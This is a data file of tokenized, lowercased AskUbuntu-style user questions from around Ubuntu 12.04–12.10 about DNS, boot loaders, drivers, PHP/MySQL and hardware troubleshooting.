232113	unable to access my domain ( bind9 issue )	i successfully run bind9 for using domain name over the local network ( bind9 installed in 192.168.0.74 ) but when i added wan for adding the internet to all the network , all the pcs became unable to see that domain name . how can i fix this issue ? here 's my router configurations : lan ip : ip address : 192.168.0.1 subnet mask : 255.255.255.0 dhcp server : enabled dhcp server : start ip : 192.168.0.100 end ip : 192.168.0.254 dns1 address : 192.168.0.74 dns2 address : 8.8.8.8 wan : fixed ip address : 192.168.0.2 subnet mask : 255.255.255.0 dns address : 192.168.0.74 default gateway : 192.168.0.190 here 's my bind9 configurations : /etc/bind/named.conf.local zone `` my.lan '' { type master ; file `` /etc/bind/zones/my.lan.zone '' ; } ; zone `` 0.168.192.in-addr.arpa '' { type master ; file `` /etc/bind/zones/rev.0.168.192.in-addr.arpa '' ; } ; /etc/bind/zones/my.lan.zone $ ttl 8640 my.lan . in soa ns1.my.lan . admin.my.lan . ( 2012121600 28800 3600 604800 38400 ) my.lan . in ns ns1.my.lan . my.lan . in mx 10 mta.my.lan . www in a 192.168.0.74 mta in a 192.168.0.74 ns1 in a 192.168.0.74 @ in a 192.168.0.74 /etc/bind/zones/rev.0.168.192.in-addr.arpa $ ttl 8640 @ in soa ns1.my.lan . admin.my.lan . ( 2012121600 ; serial 28800 ; refresh , seconds 604800 ; retry , seconds 604800 ; expire , seconds 86400 ) ; minimum , seconds in ns ns1.my.lan . 2 in ptr my.lan ps : when i use `` nslookup my.lan '' in 192.168.0.74 pc it works but it 's not working in the other pc error message of nslookup mbnoimi @ mbnoimi-pc ~ $ nslookup my.lan server : 127.0.0.1 address : 127.0.0.1 # 53 ** server ca n't find my.lan : nxdomain
232117	after install ubuntu 12.10 , there 's no anything just background and cursor	i 'm a newbie and knew linux ubuntu a month ago . i just installed ubuntu 12.10 with windows xp . it 's success , but after login just background , no bar , no button and there is no anything . what is the problem ?
232119	why is maximum resolution 640x480 with nvidia ?	my old computer is used by my mother now . i have installed lubuntu 12.04 on it ( on 2012.11.02 ) , replacing the old , but perfectly working lubuntu 11.04 . after installing 12.04 , it was ok for a while , but after a time , i think , there were some software updates , and resolution fall back to 640x480 . i have tried many fixes . open source nvidia driver ( nouveau , nvidia-96 , experimental 310 ) previous version of nvidia driver ... edit xorg.conf ( the best result was that i copied the existing xorg.conf from my desktop computer , and with it , there is a 1280x1024 resolution , which still not fits to this widescreen monitor ) but no success . the vga card is a fx5200 , which is supported by nvidia 173 driver ... but if it is supported , why is maximum resolution 640x480 with it ? ( i noticed , too , that my monitor is also unknown by the system . ) strange problem , too : the nvidia-settings is now reporting that the nvidia driver is too old , and he ca n't use it , even if there is the latest nvidia driver installed . i can agree with the open source driver , this computer is not used for gaming , or such things . so i only want a resolution , fitting to the widescreen monitor ( 1280x768 , 1280x720 , or 1440x900 ) .
232120	updated system and firefox now wo n't let me type tildes or backquotes	% uname -a linux phoebe 3.2.0-33-generic # 52-ubuntu smp thu oct 18 16:29:15 utc 2012 x86_64 x86_64 x86_64 gnu/linux i 'm running 12.04 on the machine i 'm typing this on , and i 've been running it for quite some time . i just did a dist-upgrade , and it included some update for firefox ( to 17.0.1 now ) . after restarting the browser , i noted with some surprise that i ca n't type back-quotes or tildes . they worked just a few minutes ago before the update , but not now . i use a deck keyboad , and i have the back-quote/tilde key remapped . i 've had the keyboard for many years now and the remapping has always worked : % xmodmap -pk | egrep tilde 133 0x0060 ( grave ) 0x007e ( asciitilde ) 0x0060 ( grave ) 0x007e ( asciitilde ) i can type those characters into xterm windows , into chrome , gvim , gedit , etc . what in the world is going on with firefox ? i ca n't find any relevant configuration options , and i certainly have n't been tinkering with them . i 've tried restarting it a couple times too . i 'll try running a new clean profile and see if that makes a difference ; i do have some add-ons but nothing new and nothing particularly crazy . edit nope , ca n't type the characters in a plain-jane profile either . edit — reinstalled firefox , same thing . edit again — i 've also found that virtualbox seems to ignore the xmodmap remapping . i 've basically got the grave/tilde key swapped with another key that 's remapped to `` alt '' . in virtualbox now ( i do n't think it was always this way , but i 'm not 100 % sure ) , i can type back-quote or tilde with the key that 's swapped to `` alt '' . however , that does not work in firefox — neither key works as the grave/tilde key , though i 've just verified that the remapped `` alt '' key in firefox does work ( as `` alt '' ) ! ! edit yet again — upgraded to 12.10 , same problem . something changed somewhere , as i am 100 % positive that that key was working today and over the past many months . ( why ? how do you quote code snippets inline in markdown ? i 'm on stackoverflow a lot and that 's how i noticed it was broken . )
232121	how to install ethernet driver on ubuntu 10.04 lts with working wireless connection ?	how do i install the ethernet driver on ubuntu 10.04 lts with working wireless connection ? goutham @ ubuntu : ~ $ ifconfig -a lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:5580 errors:0 dropped:0 overruns:0 frame:0 tx packets:5580 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:588423 ( 588.4 kb ) tx bytes:588423 ( 588.4 kb ) pan0 link encap : ethernet hwaddr 72:1b : d4:0f : a8:4f broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 68 : a3 : c4 : fe:7c:1c inet addr:192.168.43.167 bcast:192.168.43.255 mask:255.255.255.0 inet6 addr : fe80 : :6aa3 : c4ff : fefe:7c1c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:86963 errors:0 dropped:0 overruns:0 frame:0 tx packets:77195 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:111515707 ( 111.5 mb ) tx bytes:9272272 ( 9.2 mb ) goutham @ ubuntu : ~ $ cat /etc/network/interfaces auto lo iface lo inet loopback goutham @ ubuntu : ~ $ lspci -nn |grep ethernet 01:00.0 ethernet controller [ 0200 ] : atheros communications ar8152 v2.0 fast ethernet [ 1969:2062 ] ( rev c1 ) goutham @ ubuntu : ~ $
232122	recording video with audio from webcam ?	i 've tried cheese and wxcam and both of those record the video fine , but there is no audio in the videos . how can i record a video from my webcam with audio as well ?
232126	installed ubuntu on one drive and left windows 7 on the drive , now ca n't boot to win7	here is my boot-repair report : http : //paste.ubuntu.com/1460148/ i want to be able to dual boot win7 and ubuntu . when i boot my machine , i see options for ubuntu in grub but no win7 . do i need to fix my win7 bootmgr and try bootfix as the report suggested ? cheers -td
232131	problem with recordmydesktop program	i am trying to record some tutorials using recordmydesktop application . the problem is the video becomes jagged and unusable as you can see from the screenshot i have taken while playing a saved video . i do n't know what can be the problem , but i guess it has something to do with my graphics driver . my laptop is using intel hd 3000 series and i could n't find any update for it . if you know what might be the problem and how to solve it i will really appreciate it !
232139	overheating hp dv6 laptop	ever since i installed ubuntu 12.10 i 've been having overheating issues , and poor battery life . jupiter indicates that my cpu is 45째 while idle , and 65-75째 while performing common tasks . my battery lasts for like an hour and a half . i asked a similar question before : how to improve battery life on a hp pavilion dv6 ? dra7 pointed out that it might be a problem related to having hybrid intel/ati gpu , i tried to use the proprietary drivers using `` software sources '' but ubuntu always boots in low graphics mode or something like that : here 's a snapshot , notice what happens when i try to open catalyst control centre . i read this interesting article , and attempted to install the driver provided by amd , but i had no luck with that either . https : //help.ubuntu.com/community/binarydriverhowto/ati also : i 'm not sure if this is relevant but this is what happened when i ran sudo aticonfig -- initial while using fglrx -updates driver . my laptop is an hp pavilion dv6 6185la . thanks for your answers , this is the only thing that 's keeping me from switching to ubuntu completely .
232146	how do i make ubuntu recognize my wifi network card ?	first of all i have to say i am using ubuntu and linux at all for a day now ... so sorry if i ask dumb questions . the problem is that i can not find a way to get a wireless connection . in all settings > network i see only wired and network proxy , so i guess ubuntu does not recognize any wireless card or at least does not have the right drivers to use it properly . my pc is a hp compaq presario c500 . here is some information from the terminal : lshw -class network : *-network unclaimed description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:06:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory:80400000-80403fff [ ... ] lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub lspci : 06:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) rfkill list all : 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no
232147	php mail ( ) with ssmtp	i have a very peculiar problem ... i have a ubuntu server 12.04 with lamp installed and ssmtp installed and configured properly ... now i can send mails from my terminal with and without sudo . this tells me that my ssmtp configuration is correct . i can send mail from my php script using : mail ( 'toemail @ gmail.com ' , $ subject , $ message ) ; but , when i replace the toemail with a variable containing the string of the email , i want to send to , like : mail ( $ to , $ subject , $ message ) ; then in this case the mail is not sent , and instead gmail tells me that i have entered the wrong address ... gmail displays that address as 'toemail @ gmail.com ' ... while in the first case the address in the email which is received , is received without quotes ... i have searched a lot and i just cant find an answer ... this is the message i receive : delivery to the following recipient failed permanently : 'toemail @ gmail.com'
232150	hide users from login screen on kubuntu 12.10	this question is a 2 part question ( i know there is already a question on gdm ) : when i create a new user that person shows up on the login screen for kubuntu 12.10 however i would like to hide that user so he/she does n't show up . this has happened for several service type accounts i 've created that i want to hide . the other user case would be a shared computer where i would want my wife 's user and my son 's user to show up , but my user ( the admin account ) to be hidden . so is this possible ? follow up to that question , if there is a way to hide that user from login , how would i go about logging to such user ? thanks in advance , jonathan
232152	problem with internet-connected ubuntu apps ( software center , nuvola player , lightread , ubuntu tweak ) in 12.10 quantal quetzal )	there seems to be something broken with the ubuntu software center ( or at least my install of it ) , and what ever it is also effects some other internet-connected native ubuntu apps ( ubuntu tweak , nuvola player , and lightread ( although lightread does n't give the error message ) ) . when i try to install a free app that goes through the payment service ( as in one that you 'buy ' for $ 0.00 ) , or a paid app , in the software center , i get this message : *unable to load page problem occurred while loading the url https : //software-center.ubuntu.com/subscriptions/en/ubuntu/quantal/+new/ ? archive_id=commercial-ppa-uploaders % 2fstormcloud & arch=amd64 can not resolve hostname ( software-center.ubuntu.com ) * nuvola gives me a similar message : unable to load page problem occurred while loading the url http : //8tracks.com/ can not resolve hostname ( 8tracks.com ) and ubuntu tweak gives : unable to load page problem occurred while loading the url ( i have to put this text here so it 's not more than two hyperlinks in the post ) http : //ubuntu-tweak.com/utapp/ can not resolve hostname ( ubuntu-tweak.com ) i have tried reinstalling everything other than the software center . the problem appeared a few weeks ago . my internet works fine . i ave screenshots of the errors but i do n't think it would help much ; they just look like an unstyled firefox server not found error , and have a 'try again button ' . i have no clue what is wrong , and any help would be greatly appreciated ! ubun2
232155	can i install ubuntu on a 1.87 gb flash drive ?	can i install ubuntu with a 1.87 gb flash drive , or is that too small ? i 'm sick of windows but only have a 1.87 gb usb stick to install from . no dvds .
232159	mysql broken on localhost since update	all . after a recent 12.04 update ( mysql was updated ) , when trying to access my localhost site i get the following error : database error : unable to connect to the database : the mysql adapter 'mysql ' is not available . however , from a terminal window i can see mysql running as a service and i can access and use mysql from there . any ideas on what happened ? ? is this a config change i need to do in apache ? ? thanks in advance ! grpace
232160	installed ubuntu for dual-boot only windows comes up ( tried boot-repair )	on my computer i have a dual-boot of windows 7 and ubuntu 12.10 . ubuntu was just installed from a usb flash drive . after the installation finishes , my computer boots straight to windows without any indication that either grub or ubuntu is even installed . if i boot from the usb drive again , the install screen shows up as if i did n't install it . i 've tried boot-repair and got : link to paste.ubuntu.com and this is what i tried to repair : sudo chroot `` /mnt/boot-sav/sda7 '' dpkg -- configure -a sudo chroot `` /mnt/boot-sav/sda7 '' apt-get install -fy sudo chroot `` /mnt/boot-sav/sda7 '' apt-get purge -y -- force-yes grub*-common shim* linux-signed*
232166	dell xps 15z overheats when using optirun	i installed bumblebee on my dell xps 15z running ubuntu 12.10 . now whenever i use optirun to play a game like minecraft my laptop gets really hot and crashes in about 5 minutes . what can i do to make it not overheat ? i am asking how to somehow limit optirun so it does n't overheat and shut off the computer . getting hot is fine as long as it does n't crash . i do n't know if this is possible but i need a way to play games like minecraft using optirun without my laptop overheating .
232168	why doesnt the `` script '' option show up on right clicking in the desktop in ubuntu 12.10 ? how to make it appear ?	when you right click on a linux desktop , a menu appears which contains entries like `` new folder '' , `` change desktop background '' , `` paste '' , `` scripts '' , etc . but on a fresh install in ubuntu 12.10 , the `` scripts '' option is not showing . i suspect it has something to do with the updated `` nautilus file manager '' software . is it possible to turn on the script option so that i can execute scripts with a single click ? thank you ...
232170	destop translation tool	i am a journalist whose primary job is to translate articles from russian to english language . in windows i was fond of using http : //www.dicter.net/ basically what i need is something that watches clipboard too & ( via a click or something ) auto translate them to some preset language ( in my case russian âť english ) . i would be happy if someone also mentions application that have rpms too because i also use fedora 17 .
232171	wireless card not supported on ubuntu	why does n't ubuntu 12.04 natively support any wireless interfaces i try ? i 've tried both bcm4312 and rt2870 chips . i 've followed both of the manuals on this site , but none of them have been useful . this is my last attempt to use linux after trying to get used to it after 12 years .
232187	ca n't access ubuntu 12.04 ( no grub screen ) after erasing and reinstalling windows partition	i erased a windows xp partition and installed windows 7 on it . i have no grub screen now and the computer boots straight to windows . what can i do to reinstall grub ? edit : i tried this sudo grub-install install_device not specified . usage : grub-install [ option ] install_device install grub on your drive . -h , -- help print this message and exit -v , -- version print the version information and exit -- modules=modules pre-load specified modules modules -- boot-directory=dir install grub images under the directory dir/grub instead of the /boot/grub directory -- grub-setup=file use file as grub-setup -- grub-mkimage=file use file as grub-mkimage -- grub-mkrelpath=file use file as grub-mkrelpath -- grub-mkdevicemap=file use file as grub-mkdevicemap -- grub-probe=file use file as grub-probe -- no-floppy do not probe any floppy drive -- allow-floppy make the drive also bootable as floppy ( default for fdx devices ) . may break on some bioses . -- recheck probe a device map even if it already exists -- force install even if problems are detected -- disk-module=module disk module to use install_device can be a grub device name or a system device filename . grub-install copies grub images into /boot/grub , and uses grub-setup to install grub into the boot sector . report bugs to < bug-grub @ gnu.org > . ubuntu @ ubuntu : ~ $ sudo grub-install /boot/grub /usr/sbin/grub-probe : error : can not find a device for /boot/grub ( is /dev mounted ? ) . sudo grub-install /boot/grub did n't work , what to do then ?
232189	what is unity panel ?	could someone point out to me what unity panel looks like ? i am using version 12.10 , 64 bit , us english .
232195	how do i compile kernel modules ?	i need to compile kernel modules under ubuntu version 12.10 what is the build command please ? ( i am new to linux and ubuntu ; hence i need detailed instructions . thanks )
232200	how do i install development tools for 12.10 ?	i have a source tarball : ap-kernelmodule-1.0.14-13.tar.gz i have to compile a kernel module out of it and was instructed to install development tools for my ubuntu version ( which is 12.10 ) . the format is : sudo apt-get install linux-headers- $ ( uname -r ) build-essential question # 1 : what is uname ? ( when i installed ubuntu , i input sharon as my name and which is also my account name . whenever i open a terminal window , the words sharon @ sharon : appear ) based on the format , i should input : sudo apt-get install linux-headers- $ ( sharon -r ) build-essential or sudo apt-get install linux-headers- $ sharon -r build-essential question # 2 : which of the above is correct ? ( i am new to linux and ubuntu ; hence detailed instructions are appreciated )
232202	how do i extract this source tarball ?	i have a source tarball : ap-kernelmodule-1.0.14-13.tar.gz what specific commands should i issue to extract it ? what is the default folder/directory of the extracted contents ? can i change the destination folder/directory of the extracted contents ? i am new to linux and ubuntu ; hence detailed instructions are appreciated .
232206	how to upgrade the bios in a hp probook 6560b via the hp_tools partition ?	i recently discovered the there is a bios update version f.28 available for my ( work ) notebook which is a hp probook 6560b booting with version f.20 . i hope that this might fix the always-running fans in that machine . the bios update is available as a softpaq for download here : ftp : //ftp.hp.com/pub/softpaq/sp59001-59500/sp59012.exe ftp : //ftp.hp.com/pub/softpaq/sp59001-59500/sp59012.cva ( text/ini file describing the contents ) according to the bios help i should find a bin and a sig file in there with the same name as the bios variant ( which is 68sce according to dmidecode ) . that one should be placed on the hp_tools partition into the directory /hewlett-packard/bios/new and it can be upgraded through the bios ( if a hpbiosupdate.efi module exists in /hewlett-packard/biosupdate ) . it looks like everything is prepared properly : # mount /dev/disk/by-label/hp_tools /mnt/ # ls -lr /mnt/hewlett-packard/bios* /mnt/hewlett-packard/bios : total 12 drwxr-xr-x 2 root root 4096 dec 21 2011 current drwxr-xr-x 2 root root 4096 dec 21 2011 new drwxr-xr-x 2 root root 4096 dec 21 2011 previous /mnt/hewlett-packard/bios/current : total 2564 -rwxr-xr-x 1 root root 2621440 dec 21 2011 68sce.bin -rwxr-xr-x 1 root root 256 dec 21 2011 68sce.sig /mnt/hewlett-packard/bios/new : total 0 /mnt/hewlett-packard/bios/previous : total 0 /mnt/hewlett-packard/biosupdate : total 2112 -r-xr-xr-x 1 root root 259072 aug 31 2010 cryptrsa32.efi -r-xr-xr-x 1 root root 443904 aug 31 2010 cryptrsa.efi -rwxr-xr-x 1 root root 706528 mar 28 2011 hpbiosupdate32.efi -rwxr-xr-x 1 root root 256 mar 28 2011 hpbiosupdate32.s09 -rwxr-xr-x 1 root root 256 mar 28 2011 hpbiosupdate32.sig -rwxr-xr-x 1 root root 722848 mar 28 2011 hpbiosupdate.efi -rwxr-xr-x 1 root root 51 dec 21 23:59 hpbiosupdate.log -rwxr-xr-x 1 root root 256 mar 28 2011 hpbiosupdate.s09 -rwxr-xr-x 1 root root 256 mar 28 2011 hpbiosupdate.sig unfortunately are there no bin and sig files in the softpaq , only a cab file which contains files which might be the correct ones but are just named rom.* . there is also a rom.cab which contains some rom-files as well : # curl -o ftp : //ftp.hp.com/pub/softpaq/sp59001-59500/sp59012.exe % total % received % xferd average speed time time time current dload upload total spent left speed 100 22.0m 100 22.0m 0 0 529k 0 0:00:42 0:00:42 -- : -- : -- 355k # 7za x -osp59012 sp59012.exe 7-zip ( a ) [ 64 ] 9.20 copyright ( c ) 1999-2010 igor pavlov 2010-11-18 p7zip version 9.20 ( locale=en_us.utf-8 , utf16=on , hugefiles=on,4 cpus ) processing archive : sp59012.exe extracting /68sce.cab extracting /68scf.cab extracting /hpqflash/hpqrun.exe extracting /hpqflash/map.ini extracting /hpqflash/sp59012_e.exe extracting /hpqflash/sp59012_f.exe extracting /hpqflash.exe extracting /hpqrun.exe extracting /map.ini extracting /rom.cab extracting /wssp59012.rtf everything is ok files : 11 size : 25651054 compressed : 23089672 # find sp59012 -name '*.cab ' | xargs -i_ cabextract -d _.d _ extracting cabinet : sp59012/rom.cab extracting sp59012/rom.cab.d/rom.bin extracting sp59012/rom.cab.d/rom.sig extracting sp59012/rom.cab.d/ver.txt extracting sp59012/rom.cab.d/ver.sig extracting sp59012/rom.cab.d/efibios.sig all done , no errors . extracting cabinet : sp59012/68scf.cab extracting sp59012/68scf.cab.d/rom.bin extracting sp59012/68scf.cab.d/rom.sig extracting sp59012/68scf.cab.d/ver.txt extracting sp59012/68scf.cab.d/ver.sig extracting sp59012/68scf.cab.d/efibios.sig all done , no errors . extracting cabinet : sp59012/68sce.cab extracting sp59012/68sce.cab.d/rom.bin extracting sp59012/68sce.cab.d/rom.sig extracting sp59012/68sce.cab.d/ver.txt extracting sp59012/68sce.cab.d/ver.sig extracting sp59012/68sce.cab.d/efibios.sig all done , no errors . # cat sp59012/map.ini [ system_id ] 1619=hpqflash.exe -s -a -f68sce.cab -phpqssm.bin 1618=hpqflash.exe -s -a -f68scf.cab -phpqssm.bin 1621=hpqflash.exe -s -a -f68sce.cab -phpqssm.bin 161c=hpqflash.exe -s -a -f68scf.cab -phpqssm.bin 161d=hpqflash.exe -s -a -f68sce.cab -phpqssm.bin 1620=hpqflash.exe -s -a -f68scf.cab -phpqssm.bin 177c=hpqflash.exe -s -a -f68sce.cab -phpqssm.bin the map.ini points to the 68sce.cab ( 1619 is the mainboard 's id according to dmidecode ) . i could try the files from that file . but i do n't want to brick my notebook . has anybody done this before successfully ?
232208	what kind of filesystem do you recommend for usb flash drive ?	this is a problem i 'm having when using ubuntu : i have two computers that have ubuntu installed on them ( comp1 and comp2 ) . i create a document with ubuntu on comp1 and then copy the file onto a fat formatted usb flash drive . via the flash drive i paste the document onto comp2 . the problem is that the file-permissions are never preserved during the transfer . i 'm assuming because the fat is not supporting the permissions . is there a solution to this ? should i continue to use fat file system for usb flash drives ( because fat is best for flash drives ) and just live with this permissions issue ? or is it recommended to reformat my flash drive with a more `` ubuntu friendly '' file system that will preserve the permissions ?
232211	how do i use testdisk ?	i would really appreciate it if someone could give me a walkthrough in testdisk . i would n't ask for this , but i caused this problem by trying to fix things myself using testdisk without really knowing how , so now i 'm nervous to try anything else . i was messing with it trying to fix another problem and now i only have 1 partition out of the 9 that there was . when i use analyze , everything comes up exactly like it used to and all my files are still there . d fat16 > 32 . d hpfs - ntfs d hpfs - ntfs d linux d linux d linux d linux d linux d linux swap now what do i do to rewrite the old partition structure to the disk ? also if it helps , the fat16 is the dell utility and i 'm pretty sure the 1st linux partition just 'holds ' the rest of the linux partitions .
232215	stuck in grub rescue mode	i messed up my new laptop while trying to set up a dual-boot with ubuntu and windows 8.i did a whole bunch of stuff trying to get it to work and now when i try to boot i get stuck in grub 's recovery mode with no errors . my question is : can i boot from ubuntu on a usb drive to erase both windows 8 and ubuntu to just install ubuntu ? will this get ride of the grub rescue mode problem .
232216	php and mysql not communicating	i have come to the conclusion that my php installation and my mysql installation are not getting along ; i’m working on making my first web page that uses mysql for content , but after two days , man pages , online documentation , and dozens of tutorials , i just can’t get the php/mysql part to work . i have an established home web server ( i am the only admin/user ) that runs apache and hosts my web pages . i have mysql installed , and was able to create and query a database through terminal . i have php installed , and can use echo to print text to the document . when i work with mysql however , everything changes… i have a page that contains initialization stuff in . contains a few paragraphs of hardcoded html and then php code to access mysql . when i first loaded the page , all that resulted was a blank page . i commented out the php section and reloaded to confirm that the plain html still worked , which it did . therefore , some part of php was keeping any of the page from ever loading . to begin troubleshooting my code , i left all of the php code commented except the following code for the server connection , which is adapted from several different tutorials : < ? echo ( `` < p > php is working < /p > '' ) ; $ ses = mysql_connect ( `` localhost '' , '' username '' , '' password '' ) ; if ( ! $ ses ) { echo ( `` < p > connection to content server failed. < /p > '' ) ; exit ( ) ; } echo ( `` < p > database connected < /p > '' ) ; ? > when the page is loaded , the beginning html loads in addition to a paragraph reading “php is working” but neither the failure or success message appear . i removed the if structure from the code - so that only two echos and the mysql_connect remained – and got the same result . it seems that the mysql_connect feature is causing the server to stop loading the code when it is run , but i’m out of ideas for how to fix it . for the record : i’ve modified the php.ini file to include the “connection = msql.so” line , and i’m using mysql 5.5 , apache 2.2.22 , php 5.3.10 , ubuntu 12.04 . also , both my router and modem have been configured to forward port 3306 to the server – though i don’t see how that should be necessary – and my mysql username and password have been triple checked and are identical to the ones that i use successfully in terminal . what am i missing ?
232223	setting root session and user session to same bus ?	i have a script that has to be run under root , with bindings to dbus . dbus_session_bus_address = 'address set under .dbus file ... ' class newapp ( dbus.service.object ) : def __init__ ( self ) : busname = dbus.service.busname ( 'org.newapp ' , dbus.sessionbus ( mainloop=dbusgmainloop ( ) ) ) dbus.service.object.__init__ ( self , busname , '/org/newapp ' ) @ dbus.service.method ( 'org.newapp ' , out_signature='s ' ) def do_stuff ( self ) : return 'stuff' if __name__ == '__main__ ' : na = newapp na ( ) gobject.mainloop ( ) .run ( ) where do_stuff has code that needs to have root access . i have found that when you run the program under root , this creates a separate dbus session and i would need to set the 'dbus_session_bus_address ' . i have thought about separating the script into to two different files and just import the other but , i would like to know how to do it this way too . this is giving me trouble , i 'm not sure where or how to set the address properly . if anyone has any insight i would greatly appreciate it .
232224	very slow internet on ubuntu 12.10	after installing ubuntu 12.10 , everything worked fine . i had full speed through wifi and the connection was stable . i did a apt-get upgrade and rebooted the computer . first it would n't connect to the router anymore . after doing this trick i was able to connect again , but now the speed wo n't go more than 4 kb/s ( should be 1,3 mb/s ) . if i use a usb wifi dongle , everything works as it should .
232226	how to edit kernel parameters	i 'm using an acer aspire one 722 with ubuntu 12.10 ( 32 bit ) . i 've been having problems with getting audio to play over hdmi and after some searching around , i found that i have edit the kernel parameter so that it reflects radeon.audio=1 , which will enable audio over hdmi . my problem is that i do n't know how to make that fix .
232236	gotomeeting codecs	i have plenty of *.wmv files ( webinars recorded by gotomeeting and downloaded ) . now i can not watch the files anymore since i switched from windows to ubuntu . i tried to install the gotomeeting-codecs with wine and copied the g2m.dll into /usr/lib/codecs . but still does not work . any ideas how to fix the problem ? thank you in advance .
232237	i am trying to build a realtek 8723e module for my wireless but i am getting errors	following the instruction found here i have attempted to build this driver . some information about my laptop computer : toshiba satellite s855-s5254 8 gb ram intel i7-3610qm cpu 2.30 ghz ethernet - atheros ar8161/8165 pci-e gigabyte ethernet controller wireless - realtek rtl8723ae wireless lan 802,11n pci-e nic 64 bit windows 7 os installed 64 bit ubuntu desktop 12.10 installed a quick note , i have been using a usb wireless nic to download files as necessary and then i remove it when it is not needed . what i am getting is as follows : i first get the following using this syntax : sudo apt-get install build-essential linux-headers-generic linux-headers-uname -r which results in the following : reading package lists ... building dependency tree ... reading state information ... build-essential is already the newest version . linux-headers-3.5.0-17-generic is already the newest version . linux-headers-generic is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 220 not upgraded . this was the second time i had executed the above syntax because i was not sure it had completed correctly . not sure as to if things were going correctly i then went to retrieve the driver tarball an extract it using the following : wget -o- http : //dl.dropbox.com/u/57056576/drivers/realtek/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012.tar.gz | tar -xz i do believe all went well with this for all the files are there as listed in the archive listing , i then excute the make command with the following results : cd realtek make make -c /lib/modules/3.5.0-17-generic/build m=/home/slalonde/realtek modules make [ 1 ] : entering directory /usr/src/linux-headers-3.5.0-17-generic' cc [ m ] /home/slalonde/realtek/base.o make [ 1 ] : leaving directory/usr/src/linux-headers-3.5.0-17-generic' and then i do the make install with the following results : make -c /lib/modules/3.5.0-17-generic/build m=/home/slalonde/realtek modules make [ 1 ] : entering directory /usr/src/linux-headers-3.5.0-17-generic' cc [ m ] /home/slalonde/realtek/base.o make [ 1 ] : leaving directory/usr/src/linux-headers-3.5.0-17-generic' i the check to see if the driver is there using the following : sudo modprobe rtl8723e fatal : module rtl8723e not found so as you can see i am not having much success . any help would be appreciated .
232250	unable to login to ubuntu after installation of gnome desktop	after installation of gnome desktop on my ubuntu 12.04lts , i 'm unable to log in to my administrator account . please note that using guest account i 've removed gnome desktop and killed gnome session but i 'm unable to run any other sudo command from my guest account . the error is /var/lib/dpkg/lock cant be unlocked . request help . regards utpal
232253	dual-booting windows 7 with ubuntu installed	now now , i 'm sure your hackles have been raised by a very familiar question , but hear me out . i 'm running ubntu 12.04 on a gnome classic desktop . i would like to install windows 7 home premium 64-bit over it , in a dual-boot . i 've been looking over several links as to the procedure : https : //help.ubuntu.com/community/windowsdualboot https : //help.ubuntu.com/community/multiosboot how to install windows 7 after ubuntu and dual boot ? how can i install windows 7 after i 've installed ubuntu ? now , there are many plausible sounding solutions contained within these links . though the general setup is almost always broken up into 3 discrete steps of creating an ntfs partition , installing windows , and repairing grub ; my question here is , which of them should i follow ? i 'm assuming i ca n't attempt all of them in sequence without farking something somewhere . the ones that look most promising to me are : > its easy to install duel os but if you install windows after ubuntu > grub will be affected . grub is a booting system of linux base system . > you can follow above steps or you can do just the following ... . > > make space for your windows from ubuntu . ( use disk utility tools from > ubuntu ) install windows on freed space . after installing login to > windows to fix this you can install a program 'easybcd ' in windows . > download it here > > follow these steps to restore grub when after installing easybcd : > > - launch the program and select add new entry from the easybcd toolbox > > - select the 'linux/bsd ' from the operating systems column > > - choose grub ( legacy ) under type and click on the add entry icon > > - choose yes to the restart prompt grub will be displayed after the restart which will detect the ubuntu partition for you to be able to > boot into ubuntu and > installing windows after ubuntu is not the recommended process for a > dual boot windows and ubuntu system , but it is possible . > > first , you have to make sure that the 50gb free space is available , > resizing your ubuntu by using gparted if necessary . also use gparted > or disk utility to format the the free space as ntfs , this prevents > windows 7 from creating an additional boot partition in addition to > the `` c '' drive . next , boot to the windows dvd installer and install > windows on the ntfs partition . upon reboot , windows will automatically > boot and you wo n't see the grub menu allowing you to choose ubuntu , > because the windows bootloader has replaced grub . > > now , what you need to do is run ubuntu from livecd or liveusb and > install boot-repair . > > to install boot-repair , open up a terminal by pressing ctrl+alt+t and > type the following commands : > > sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get > update sudo apt-get install -y boot-repair & & boot-repair after > installation , boot-repair will automatically launch , if is does n't , > launch it via dash . > > make sure to select recommended repair to repair grub . reboot and > that 's it . > > you should now have a grub menu on boot , allowing you to choose from > ubuntu , memtest , and windows 7 what do you think ?
232262	what 's the point of having /vmlinuz and /initrd.img ?	ubuntu keeps a symbol links for current vmlinuz and initrd.img , at / , but what 's the point of doing so ? and given that many people have their /boot on a different partition .
232265	hdmi audio output problem	i 'm running ubuntu 12.10 and having trouble with the audio output through hdmi on my acer aspire one 722 . it 's using an amd c-60 . i was able to add in the radeon.audio=1 kernel parameter , which was supposed to enable hdmi audio playback but even after running update-grub and rebooting , the problem persists when i choose hdmi as the audio output after plugging in my hdmi cable . at this point , i 'm not sure what else to do .
